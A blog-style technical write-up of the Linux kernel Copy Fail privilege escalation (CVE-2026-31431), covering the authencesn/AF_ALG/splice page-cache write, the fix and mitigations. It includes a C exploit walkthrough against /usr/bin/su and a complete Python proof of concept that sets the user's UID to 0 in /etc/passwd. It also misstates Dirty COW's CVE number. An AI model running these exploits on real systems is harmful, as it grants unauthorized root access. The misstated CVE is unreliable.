2026-05-03
On April 29, 2026, Theori publicly
disclosed Copy Fail (CVE-2026-31431), a
local privilege escalation affecting every major Linux distribution
shipped since 2017. A logic flaw in the kernel’s authencesn
cryptographic template, chained through AF_ALG sockets and
splice(), gives an unprivileged user a deterministic 4-byte
write into the page cache of any readable file. A 732-byte
Python script corrupts /usr/bin/su in memory and pops a
root shell. No race, no offsets, no compilation.
When I first read the Xint
writeup I immediately thought of Dirty COW (CVE-2016-5341), another
page cache corruption bug that gave root on everything. But the
mechanics are completely different. Dirty COW was a race condition in
the copy-on-write fault handler. Two threads racing
madvise(MADV_DONTNEED) against a write fault could sneak a
write into a read-only mapping. Copy Fail has no race at all, just a
deterministic sequence of syscalls that any unprivileged user can call.
Dirty COW wrote through the virtual memory subsystem, which at least
understands page permissions. Copy Fail writes through the crypto
subsystem, which has no concept of page ownership. It just sees a
scatterlist entry and writes to it.
I also thought this was an out-of-bounds write at first (when I saw “writes 4 bytes past the ciphertext boundary”). It’s not. We’ll get to why, and it’s the reason KASAN never caught it in eight years.
The Xint writeup is well done but moves fast through kernel
internals. Here we go slower, covering page cache, scatterlists,
splice() and AF_ALG/AEAD so you can follow the
full chain even if you’ve never touched kernel MM code. All credits for
the discovery go to Taeyang Lee, Theori and the Xint Code Research Team
Every time we read() a file, the kernel doesn’t go to
disk. It goes to the page cache - a system-wide
in-memory cache of file data, organized by (inode, offset) pairs. If the
page is already cached from a previous read (by any process), the kernel
returns it directly. If not, it reads from disk, caches it, then returns
it.
container 1 container 2 host
+-----------+ +-----------+ +-----------+
| Process A | | Process B | | Process C |
| read() | | execve() | | mmap() |
+-----+-----+ +-----+-----+ +-----+-----+
| | |
+-------------------+-------------------+
|
v
+---------------------------------------------------------+
| Page Cache (RAM) |
| |
| /usr/bin/su +--------+--------+--------+ |
| | page 0 | page 1 | page 2 | |
| | ELF | .text | .data | |
| +--------+--------+--------+ |
+---------------------------+-----------------------------+
^
miss | populate
v
+-------------+
| disk |
| /usr/bin/su |
+-------------+
Two structures matter here:
struct page:
represents a single physical page (usually 4096 bytes). Has
flags, a mapping pointer (back to the file’s
address_space), and an index (the page’s
offset within the file in page-sized units).struct address_space:
associated with an inode. It’s the page cache index for a specific file,
a radix tree
mapping page offsets to struct page pointers.The critical property for this vulnerability are the page cache is shared across the entire system. If two processes in different containers, cgroups and user namespaces read the same file on the same filesystem, they will share the same physical pages. Corrupt a Page Cache page (yeah, this is how we refer it, page page page…) and all reader sees the corrupted state.
One more thing. The page cache tracks whether a page has been
modified (the “dirty” bit). When a page is dirtied through the normal
write path (write(), mmap store), the kernel
marks it dirty and eventually writes it back to disk. But the corruption
we’re about to see doesn’t go through the normal write path. The page is
never marked dirty and the file on disk is untouched, but every process
that reads it gets the corrupted in-memory version.
The kernel often needs to describe buffers that span multiple
non-contiguous physical pages. A read() might return data
from pages scattered across physical memory. Crypto operations need to
process input spread across different allocations. The
scatterlist is the kernel’s way to represent these
discontiguous buffers.
A single struct scatterlist
entry describes one contiguous chunk:
struct scatterlist {
unsigned long page_link; // struct page* | flags in low 2 bits
unsigned int offset; // byte offset within the page
unsigned int length; // byte length of this chunk
dma_addr_t dma_address;
};The page_link field is overloaded. The low 2 bits encode
flags:
SG_CHAIN):
this entry it’s a pointer to the next scatterlist array. This is how
multiple SG (scatter-gather (kernel devs love their two-letter
abbreviations, sg, sk, mm,
vm)) arrays get chained together.SG_END):
this is the last entry in the chain.The upper bits (after masking off the low 2) store the
struct page* pointer.
A chain of scatterlists looks like this:
SG Array 1 SG Array 2
+-------------------------+ +-------------------------+
| sg[0]: page_A off=0 | | sg[0]: page_C off=128 |
| len=4096 | | len=64 [END] |
+-------------------------+ +-------------------------+
| sg[1]: page_B off=0 | ^
| len=512 | |
+-------------------------+ |
| sg[2]: CHAIN |----------------+
+-------------------------+
sg_chain()
is the function that creates these links, it sets the
SG_CHAIN bit on the last entry of one array and points it
at the first entry of the next.
To actually read or write data at a byte offset within a scatterlist
chain, the kernel provides scatterwalk_map_and_copy().
It walks the chain entry by entry, skipping pages until it reaches the
target offset, then copies data in or out. This function is the one that
ultimately performs the 4-byte page cache write in this
vulnerability.
splice(): Zero-Copy I/OThe splice()
system call moves data between a file descriptor and a pipe
without copying through userspace. Instead of
read()-ing file data into a userspace buffer and then
write()-ing it to another fd, splice() passes
page references. The pipe holds pointers to the same
physical pages that live in the page cache.
splice(file_fd, pipe_wr) splice(pipe_rd, socket_fd)
+----------+ +----------+ +----------+
| File |--->| Pipe |--->| Socket |
| (on disk)| | (in mem) | | (AF_ALG) |
+----------+ +----------+ +----------+
| | |
'---------------' |
same physical pages kernel crypto
(page cache pages) receives page cache
page refs in its
scatterlist
When we splice() a file into a pipe, the pipe’s internal
buffer doesn’t get a copy of the data. It gets references to the page
cache pages themselves. Then when we splice() from the pipe
into a socket, the socket’s internal buffers (scatterlists, in the case
of AF_ALG) receive those same page cache page references. No copy at any
step. The kernel’s crypto subsystem is now holding direct pointers to
page cache pages of the file we spliced.
Without splice(), the crypto subsystem would operate on
copied buffers. With splice(), it operates on the page
cache itself. Dirty COW used the same trick of passing page references
around without copying. That one went through the VM fault handler
instead of splice().
AF_ALG is a Linux socket family that exposes the kernel’s cryptographic API to unprivileged userspace. Any user can:
int alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0); // AF_ALG = 38
struct sockaddr_alg sa = { // include/uapi/linux/if_alg.h:19
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))"
};
bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));No privileges required. No CAP_NET_ADMIN. The module
auto-loads on first use. AF_ALG was designed so userspace applications
could use hardware-accelerated crypto without writing kernel modules.
Convenient for us too.
AEAD (Authenticated Encryption with Associated Data) is a class of crypto algorithms that provides both confidentiality (encryption) and integrity (authentication tag). The input to an AEAD decryption looks like:
+---------------+--------------------+------------------+
| AAD | Ciphertext | Authentication |
| (auth'd only) | (decrypted+auth'd) | Tag (verified) |
+---------------+--------------------+------------------+
The AAD (Associated Data) is authenticated but not encrypted. It’s plaintext metadata that must not be tampered with. The ciphertext gets decrypted. The authentication tag is verified against both the AAD and ciphertext to detect tampering.
authencesnauthencesn
is a specific AEAD template used for IPsec ESP with Extended
Sequence Numbers (RFC 4303).
Every IPsec packet carries a sequence number to prevent replay attacks. Originally this was a 32-bit counter, but at 10 Gbps a 32-bit counter wraps in under 2 seconds. RFC 4303 introduced Extended Sequence Numbers (ESN), a 64-bit counter split into two halves:
Full 64-bit ESN: [ seqno_hi (32 bits) | seqno_lo (32 bits) ]
upper 32 bits lower 32 bits
Only seqno_lo goes on the wire in the ESP header. The
sender and receiver both maintain a shared counter (the Security
Association state), so seqno_hi is implicit - both sides
know it. This saves 4 bytes per packet on the wire while still getting a
64-bit anti-replay window.
The authentication hash needs to cover the full 64-bit
sequence number, including the high bits that aren’t in the
packet. So the kernel has to reconstruct the full ESN before computing
the HMAC. In the real IPsec path (esp_input_set_header()),
the ESP code takes the implicit seqno_hi from the SA
(Security Association) state, pushes
the skb header back by 4 bytes, and stuffs seqno_hi
into the AAD before passing it to authencesn:
ESP header on the wire: [ SPI | seqno_lo | IV | ciphertext | tag ]
^
| only 32 bits
AAD reconstructed for HMAC: [ seqno_hi | seqno_lo | SPI ]
bytes 0-3 bytes 4-7 bytes 8-11
(from SA) (from wire) (from wire)
Now authencesn has the full 64-bit ESN in the first 8
bytes of the AAD. But the HMAC spec for ESP says the hash should be
computed over [SPI | seqno_lo | seqno_hi | ciphertext] - a
different byte order. So authencesn needs to
rearrange these bytes before hashing. It does this by
treating the caller’s destination buffer as scratch space.
In crypto_authenc_esn_decrypt(),
three scatterwalk_map_and_copy()
calls perform the shuffle (source):
Step 1: read tmp[0..1] = dst[0..7] -- grab seqno_hi and seqno_lo
Step 2: write dst[4..7] = tmp[0] (seqno_hi) -- move seqno_hi to bytes 4-7
Step 3: write dst[assoclen+cryptlen] = tmp[1] -- stash seqno_lo PAST the ciphertext
In the normal IPsec decrypt path,
dst[assoclen + cryptlen] points to the
authentication tag, the HMAC bytes right after the
ciphertext in the AEAD buffer. The tag region is part of the same
kernel-allocated skb buffer, fully writable, about to be overwritten
with the computed HMAC anyway. Stashing seqno_lo there
temporarily is harmless. It’s scratch space that will be consumed by the
HMAC comparison and then discarded:
Normal IPsec dst buffer (single skb allocation):
+----------+--------------+----------+
| AAD | ciphertext | tag | <-- all one contiguous kernel buffer
+----------+--------------+----------+
| | |
| assoclen | cryptlen | authsize |
| ^
| dst[assoclen+cryptlen]
| = start of tag region
| safe to use as scratch
After the HMAC, crypto_authenc_esn_decrypt_tail()
restores the original layout. It reads seqno_lo back from
dst[assoclen+cryptlen] and writes the original 8 bytes back
to dst[0..7]. Clean round-trip, no side effects.
All of this assumes dst is a private, writable
buffer - that dst[assoclen + cryptlen] is safe to
write to because it’s just the tag region of a kernel-owned crypto
buffer. That breaks when someone chains page cache pages into the
destination scatterlist at that exact offset.
In 2017, commit
72548b093ee3 added an optimization to algif_aead.c
- the AF_ALG AEAD interface. The idea was simple. For decryption,
instead of using separate input and output scatterlists, operate
in-place by pointing both req->src and
req->dst to the same scatterlist. This avoids an
allocation and a copy. Makes sense as a performance win.
The AF_ALG socket works like a network socket. Userspace
transmits data into the kernel
(sendmsg/splice) and receives
results back (recvmsg). The kernel uses networking
terminology for the two sides:
splice(), these scatterlist entries point directly to page
cache pages.recvmsg() side - normal kernel memory,
not page cache.The implementation in _aead_recvmsg():
sg_chain().req->src = req->dst - both source and
destination now point to the same combined scatterlist.When the data came through splice(), the TX SGL holds
page cache pages. After chaining, those page cache
pages are now part of the destination scatterlist:
req->src --+
|
v
req->dst --> RX Buffer (user memory) TX SGL (page cache pages)
+----------+----------+ +----------------------+
| AAD | CT |--chain-->| Tag pages |
| (copied) | (copied) | | (Page Cache pages!) |
+----------+----------+ +----------------------+
<--- user memory ----> <-- still page cache! ->
The boundary between “safe to write” (user memory in the RX buffer) and “must not write” (page cache pages from splice) is now just an offset within the same scatterlist chain. Any write that walks past the AAD + ciphertext region crosses into page cache territory.
authencesn Triggers ThisThe in-place optimization has been there since 2017, and every AEAD
algorithm in the kernel uses the same dst scatterlist. So
why doesn’t every decrypt operation corrupt the page cache?
To answer that, let’s trace what actually writes to dst
during a normal AEAD decrypt. There are three subsystems involved, and
each one stays inside the safe boundary:
1. The HMAC engine (crypto_ahash_digest())
The HMAC computation reads from dst to
hash the AAD and ciphertext. It writes the computed hash into a
separate kernel buffer
(areq_ctx->tail), not back into dst. The
hash output goes into a small buffer allocated as part of the request
context. Even though the HMAC reads across the full
[0 .. assoclen+cryptlen] range of dst, it
never writes a single byte to it.
2. The cipher engine (crypto_skcipher_decrypt())
The actual AES-CBC (or whatever cipher is configured) decryption
writes plaintext to dst, but only within the ciphertext
region, dst[assoclen .. assoclen+cryptlen-authsize]. You
can see the range in authenc.c line 254-255,
skcipher_request_set_crypt(skreq, src, dst, req->cryptlen - authsize, req->iv).
This region was copied from the TX SGL into the RX
buffer. Safe user memory.
3. Tag verification (crypto_authenc_decrypt_tail())
To verify the authentication tag, the kernel reads the tag from
req->src (line
240:
scatterwalk_map_and_copy(ihash, req->src, ...)). It
reads from req->src, not
req->dst. Even with the in-place optimization where
src == dst, this is a read operation (the last argument to
scatterwalk_map_and_copy is 0 = read). The tag
bytes are read into ihash (a local buffer), compared with
the computed HMAC via crypto_memneq, and discarded.
The tag region of dst is never written
to.
Normal AEAD decrypt - who writes where in dst:
+------- RX buffer (user memory) -------+-- chained page cache --+
| AAD | ciphertext | tag pages |
+--------------+------------------------+------------------------+
| | |
HMAC reads cipher WRITES tag READ from src
(no writes) plaintext here into local buffer
(RX buffer, safe) (never written to dst)
The regular authenc (non-ESN) also writes to
dst[assoclen + cryptlen], but only during
encryption (crypto_authenc_genicv(),
line
154), where it copies the computed HMAC tag into the output buffer.
That’s the encrypt path, not decrypt. The in-place optimization with
sg_chain only applies to the decrypt path
in _aead_recvmsg().
The encrypt path uses a different
SGL layout where the RX buffer is large enough to hold AAD +
plaintext + tag, so no page cache pages are chained.
authencesn is the exception. The ESN byte rearrangement
is specific to IPsec Extended Sequence Numbers and no other AEAD
algorithm needs it. That rearrangement uses dst as scratch
space, and step 3 writes 4 bytes at
dst[assoclen + cryptlen] during the
decrypt path. Without the ESN shuffle, the in-place
optimization would be harmless. No subsystem in the normal decrypt
pipeline ever writes to the tag region of dst.
The bug went unnoticed for eight years. The in-place optimization was
tested with authenc, gcm, ccm,
and other AEAD algorithms - all of which only read the tag region during
decrypt. authencesn was the only algorithm that wrote past
the boundary, and nobody connected the two code paths.
Now the two pieces collide. With the in-place optimization,
dst is the combined RX+chained scatterlist - user memory
for AAD and ciphertext, then page cache pages for the tag region.
Let’s be concrete about assoclen and
cryptlen. These are the two parameters that define the AEAD
buffer layout:
assoclen (associated data length): how
many bytes of AAD precede the ciphertext. Set by the attacker via the
ALG_SET_AEAD_ASSOCLEN cmsg in sendmsg(). In
the PoC this is 8 (for the 8-byte ESN AAD).cryptlen (ciphertext length): how many
bytes of ciphertext follow the AAD. This is the used
parameter in aead_request_set_crypt().
It comes from how much data was sent via sendmsg() +
splice(), minus assoclen.Together they map out the dst scatterlist:
byte offset:
0 assoclen assoclen+cryptlen
| | |
v v v
dst: [ AAD (8 bytes) | ciphertext | tag ... ]
+------------------+----------------+------...--+
|<--- assoclen --->|<-- cryptlen -->|
| |
+---- RX buffer (user memory) ------+-- chained page cache --+
assoclen + cryptlen is the byte offset where the
ciphertext ends and the authentication tag begins. In normal operation,
that’s where the tag lives - safe crypto buffer memory. But with the
in-place optimization, everything past the RX buffer boundary is
page cache pages chained from the TX SGL via
sg_chain(). The offset assoclen + cryptlen
lands right there.
The authencesn ESN shuffle writes seqno_lo
at exactly dst[assoclen + cryptlen] (step 3 above). That
offset walks past the AAD and ciphertext - which live in user memory -
and lands in the chained tag pages, which are page cache pages
from splice:
dst scatterlist (in-place):
+------ RX buffer (user memory) ------+---- chained TX SGL (page cache) ----+
| AAD (8 bytes) | ciphertext (N) | tag pages from splice |
+---------+------+--------------------+-----+--------------------------------+
| |
step 2 writes here (safe) step 3 writes here (Page Cache!)
dst[4..7] = seqno_hi dst[assoclen+cryptlen] = seqno_lo
Why exactly 4 bytes? Because seqno_lo is the low 32 bits
of the 64-bit ESN. 32 bits = 4 bytes. The size of the scratch write is
fixed by the IPsec ESN format.
When I first read the Xint writeup - “writes 4 bytes past the ciphertext boundary” - I immediately classified this as an OOB write in my head. Writing past a boundary? Classic heap overflow, right?
The write at dst[assoclen + cryptlen] is within
bounds of the dst scatterlist. The scatterlist has
valid entries at that offset, the chained tag pages.
scatterwalk_map_and_copy walks the chain, finds a valid
struct scatterlist entry with a valid
struct page pointer and a valid length, maps the page,
writes to it. No bounds check fails. No memory corruption in the heap
sense. No KASAN splat. Everything is “correct”.
The bug is about ownership, not size. The
scatterlist is the right length. The page at that offset is a real,
mapped, valid page. But the page belongs to the page cache, it’s a
cached copy of an on-disk file, and authencesn treats it as
a private scratch buffer. In the normal IPsec path, that offset points
to a kernel-allocated skb page that nobody cares about. With the
in-place optimization and splice(), the same offset now
points to a page cache page that was chained in via
sg_chain().
No buffer overflow. No use-after-free. No type confusion. The write
is architecturally correct. It just writes to a page that was never
supposed to be in that scatterlist position. A logic bug about which
pages end up in dst, not about how many bytes get written.
Dirty COW was invisible to memory sanitizers for the same reason. The
write targets a valid page, just the wrong page. The kernel’s
memory safety tools check sizes and lifetimes, not ownership.
What does the attacker control?
tmp[1] is
seqno_lo, bytes 4-7 of the AAD. The attacker provides the
AAD via sendmsg(). They choose every byte.splice()-d).splice() and the
assoclen/cryptlen parameters.And the write happens before HMAC verification.
crypto_authenc_esn_decrypt() rearranges the ESN first (line
293-295), then computes the HMAC (line
305), then checks it in decrypt_tail(). The HMAC will
fail (the ciphertext is attacker-controlled garbage) and
recvmsg() returns an error. But the 4-byte write into the
page cache is already done.
The public PoC is a 732-byte obfuscated Python script. To make the syscall flow easier to follow, here’s the same logic as readable C. There’s also a full C port by @tgies.
Step 1: Open the AF_ALG socket and bind
authencesn
int alg_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
struct sockaddr_alg sa = {
.salg_family = AF_ALG,
.salg_type = "aead",
.salg_name = "authencesn(hmac(sha256),cbc(aes))"
};
bind(alg_fd, (struct sockaddr *)&sa, sizeof(sa));This creates an AF_ALG
socket and binds it to the authencesn AEAD template. No
privileges needed, the kernel auto-loads algif_aead and
authencesn on first use.
Step 2: Configure the crypto parameters
// AES-128 key, value doesn't matter, HMAC will fail anyway
uint8_t key[40] = { 0x08, 0x00, 0x01, 0x00, [4 ... 7] = 0x00, [8 ... 11] = 0x10 };
setsockopt(alg_fd, SOL_ALG, ALG_SET_KEY, key, sizeof(key));
// Authentication tag size = 4 bytes
setsockopt(alg_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, 4);
// accept() gives us the request file descriptor
int req_fd = accept(alg_fd, NULL, NULL);SOL_ALG
= 279. ALG_SET_KEY
= 1. ALG_SET_AEAD_AUTHSIZE
= 5. The key value is irrelevant, the HMAC computation will fail
regardless, and the page cache corruption happens before
verification.
Step 3: The write4 primitive, one 4-byte page
cache write
This is the core of the exploit. Each call overwrites 4 bytes at a chosen offset in the target file’s page cache:
void write4(int req_fd, int target_fd, off_t offset, uint8_t value[4])
{
// Build the AAD: 4 garbage bytes + the 4 bytes we want to write.
// Bytes 4-7 become seqno_lo in authencesn, the value that gets
// written to dst[assoclen+cryptlen], which is our page cache page.
uint8_t aad[8] = { 'A','A','A','A', value[0], value[1], value[2], value[3] };
// cmsg headers tell the kernel: decrypt mode, IV, assoclen = 8
struct cmsghdr cmsg_iv, cmsg_op, cmsg_assoclen;
// ALG_SET_IV: 16 zero bytes (AES block size)
// ALG_SET_OP: ALG_OP_DECRYPT
// ALG_SET_AEAD_ASSOCLEN: 8 (our AAD is 8 bytes)
struct msghdr msg = { /* iov = aad, cmsg = above */ };
sendmsg(req_fd, &msg, MSG_MORE); // send AAD, flag more data coming
// Now splice the target file's page cache pages into the crypto socket.
// This is where the page cache pages enter the TX SGL by reference.
int pipefd[2];
pipe(pipefd);
loff_t file_off = 0;
splice(target_fd, &file_off, pipefd[1], NULL, offset + 4, 0);
splice(pipefd[0], NULL, req_fd, NULL, offset + 4, 0);
// recv() triggers the AEAD decrypt in the kernel.
// authencesn rearranges ESN bytes -> writes seqno_lo to page cache.
// HMAC fails -> recv returns error, but the 4 bytes are already written.
char buf[4096];
recv(req_fd, buf, sizeof(buf), 0); // error expected, we don't care
close(pipefd[0]);
close(pipefd[1]);
}The sendmsg with MSG_MORE sends the AAD (8
bytes) and tells the kernel “more data is coming”. The two
splice calls then feed the target file’s page cache pages
into the socket as ciphertext + tag. When recv triggers the
decrypt, authencesn writes aad[4..7] at
dst[assoclen + cryptlen], which is a page cache page of the
target file.
Step 4: Overwrite the target binary, 4 bytes at a time
int target = open("/usr/bin/su", O_RDONLY);
// payload[] is a small ELF shellcode that calls setuid(0) + execve("/bin/sh")
for (int i = 0; i < payload_len; i += 4) {
write4(req_fd, target, i, &payload[i]);
}
// The page cache of /usr/bin/su now contains our shellcode.
// Execute it - the kernel loads from the corrupted page cache.
execve("/usr/bin/su", (char*[]){ "su", NULL }, NULL);
// we are rootEach write4 call corrupts 4 bytes of
/usr/bin/su’s page cache. After
payload_len / 4 iterations, the binary’s in-memory image
has been rewritten. execve loads it from the corrupted
cache, not from disk. The shellcode runs as root. Profit! :D
The page cache is per-filesystem, not per-namespace. A container that
mounts the host’s root filesystem (or shares a layer with it) uses the
same physical page cache pages as the host. Corrupt
/usr/bin/su’s page cache from inside a container, and the
host’s su is corrupted too. Container escape for free.
chmod 4711 Non-FixAfter the disclosure, a “mitigation” started circulating on social media:
for b in passwd chsh chfn mount sudo pkexec; do
p=$(readlink -f "$(command -v "$b")")
[ -n "$p" ] && [ "$(stat -c %a "$p")" != "4711" ] && chmod 4711 "$p"
doneIt removes the read permission from setuid binaries
(rwx--x--x instead of rwsr-xr-x), so
unprivileged users can’t open() them for reading, and
therefore can’t splice() their page cache pages.
This does not work. The vulnerability is a 4-byte write into the page
cache of any readable file, not just setuid binaries.
The original PoC targets /usr/bin/su because it’s a
convenient setuid binary to corrupt and execute. But the primitive is
far more general. As long as you can open(path, O_RDONLY) a
file, you can corrupt its page cache.
/etc/passwd is the obvious alternative target.
World-readable on every Linux system because ls -l,
id, ps, and every program that maps UIDs to
names reads it. The format is trivial, each line is
username:x:uid:gid:.... Overwriting your user’s UID field
from 1000 to 0000 in the page cache makes the
system believe you are root.
I wrote a minimal PoC that does exactly this. Instead of corrupting a
setuid binary, it overwrites the UID field of the attacker’s
/etc/passwd entry:
#!/usr/bin/env python3
## Tested on kernel 6.12.10.
import os, socket, struct
TARGET = "/etc/passwd"
USER = os.environ.get("USER", "user")
with open(TARGET, "rb") as f:
data = f.read()
# Find the line for our user: "user:x:1000:1000:..."
# The UID is the third field (after the second ':')
prefix = f"{USER}:x:".encode()
idx = data.find(prefix)
uid_offset = idx + len(prefix)
old_uid = data[uid_offset:uid_offset+4]
ALG_SOCK = 38 # AF_ALG
SOL_ALG = 279
ALG_SET_KEY = 1
ALG_SET_IV = 2
ALG_SET_OP = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5
alg = socket.socket(ALG_SOCK, socket.SOCK_SEQPACKET, 0)
alg.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
# Key format: rtattr header + crypto_authenc_key_param + authkey + enckey
# rtattr { rta_len=8, rta_type=CRYPTO_AUTHENC_KEYA_PARAM(1) }
# crypto_authenc_key_param { enckeylen=16 (AES-128, big-endian) }
# then: 16 bytes HMAC-SHA256 key + 16 bytes AES key (all zeros, value irrelevant)
key = bytes.fromhex('0800010000000010' + '0' * 64)
alg.setsockopt(SOL_ALG, ALG_SET_KEY, key)
alg.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, 4)
req, _ = alg.accept()
def write4(fd, offset, value_4bytes):
aad = b"AAAA" + value_4bytes # bytes 4-7 of AAD = seqno_lo = the written value
iv_data = b'\x10' + b'\x00' * 19
op_data = b'\x00' * 4
assoc = struct.pack("I", 8)
req.sendmsg(
[aad],
[
(SOL_ALG, ALG_SET_IV, iv_data),
(SOL_ALG, ALG_SET_OP, op_data),
(SOL_ALG, ALG_SET_AEAD_ASSOCLEN, assoc),
],
socket.MSG_MORE
)
splice_len = offset + 4
r, w = os.pipe()
os.splice(fd, w, splice_len, offset_src=0)
os.splice(r, req.fileno(), splice_len)
try:
req.recv(8 + offset)
except OSError:
pass
os.close(r)
os.close(w)
target_fd = os.open(TARGET, os.O_RDONLY)
new_uid = b"0000"
write4(target_fd, uid_offset, new_uid)
os.close(target_fd)
import pwd
info = pwd.getpwnam(USER)
if info.pw_uid == 0:
print(f"[+] '{USER}' is now UID 0 in the page cache, just run `su - {USER}`")
else:
print(f"[-] UID is {info.pw_uid}, expected 0")The attack flow is different from the setuid approach but equally effective:
/etc/passwd in the page cache, changing
user:x:1000: to user:x:0000:su - user and enter user’s own
password/etc/shadow (untouched,
password is valid)su calls
setuid(getpwnam("user").pw_uid)getpwnam reads /etc/passwd from the
corrupted page cache and returns UID 0setuid(0) - root shellNo setuid binary was corrupted. No read permission on any setuid
binary was needed. The target was a world-readable text file. The
chmod 4711 “mitigation” changes nothing.
Patch the kernel, disable algif_aead module loading, or
block AF_ALG socket creation via seccomp.
chmod doesn’t help.
Commit
a664bf3d603d reverts the 2017 in-place optimization.
The fix is conceptually simple. Keep source and destination as separate
scatterlists.
Before (vulnerable) - algif_aead.c:282:
// src and dst point to the same scatterlist (in-place)
aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);Page cache pages from the TX SGL are chained
into the shared src/dst via sg_chain(). The
authencesn scratch write lands on them.
After (fixed):
// src and dst are separate scatterlists (out-of-place)
aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);req->src now points to the TX SGL (which may contain
page cache pages from splice). req->dst points to the RX
SGL, a separately allocated buffer for the user’s
recvmsg(). The authencesn scratch write at
dst[assoclen + cryptlen] now hits the RX buffer (harmless
user memory), not page cache pages. The sg_chain() linking
page cache tag pages into a writable destination is gone.
The commit message:
crypto: algif_aead - Revert to operating out-of-place
This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in operating in-place in algif_aead since the source and destination come from different mappings.
Eight years of silent exposure, fixed by removing a performance optimization that had no meaningful benefit. Hmm.
If you can’t patch immediately, block AF_ALG socket
creation:
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null || trueThis does not affect dm-crypt/LUKS, kTLS, IPsec/XFRM, OpenSSL,
GnuTLS, SSH, or any in-kernel crypto user. Those go through the kernel
crypto API directly without AF_ALG. For containers and CI
systems, also block AF_ALG socket creation via seccomp.
72548b093ee3 - the 2017 in-place optimization
(vulnerability introduction)a664bf3d603d - the fixIf you’ve got questions, feel free to hit me up on Twitter!